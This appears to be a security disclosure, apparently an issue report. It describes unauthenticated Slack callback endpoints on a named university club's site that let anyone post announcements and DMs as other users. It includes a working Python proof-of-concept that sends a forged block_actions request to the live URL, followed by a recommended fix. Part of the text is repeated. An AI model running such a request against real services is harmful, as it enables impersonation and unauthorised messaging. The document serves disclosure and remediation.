The endpoints /api/slack/message_actions, and /api/slack/events are unauthenticated, and unsecured, meaning any 3rd party can pretend to be sending requests from Slack. This allows for a 3rd party send announcements on behalf of any user in the CSH slack, as well as send DMs to any user of the CSH slack without authentication and anonymously.
The following script shows an example of how a 3rd party can send in an annoucement as another user, bypassing verification.
#!/bin/python
import requests
import json
URL = "https://jumpstart.csh.rit.edu/api/slack/message_actions"
def send_post(user_id: str, text: str):
payload_data = {
"type": "block_actions",
"user": {
"id": user_id
},
"actions": [
{
"action_id": "yes_j",
"value": json.dumps({"text": text})
}
]
}
files = {
"payload": (None, json.dumps(payload_data), "application/json")
}
response = requests.post(URL, files=files)
print("Status:", response.status_code)
print("Response:", response.text)
if __name__ == "__main__":
# Example usage
send_post("U0906FX826S", "test")This can be fixed by implementing request verification, a feature built into the slack API:
https://docs.slack.dev/authentication/verifying-requests-from-slack/
Or, by verifiying that the host of the request is from a Slack server.
The endpoints /api/slack/message_actions, and /api/slack/events are unauthenticated, and unsecured, meaning any 3rd party can pretend to be sending requests from Slack. This allows for a 3rd party send announcements on behalf of any user in the CSH slack, as well as send DMs to any user of the CSH slack without authentication and anonymously.
The following script shows an example of how a 3rd party can send in an annoucement as another user, bypassing verification.
This can be fixed by implementing request verification, a feature built into the slack API:
https://docs.slack.dev/authentication/verifying-requests-from-slack/
Or, by verifiying that the host of the request is from a Slack server.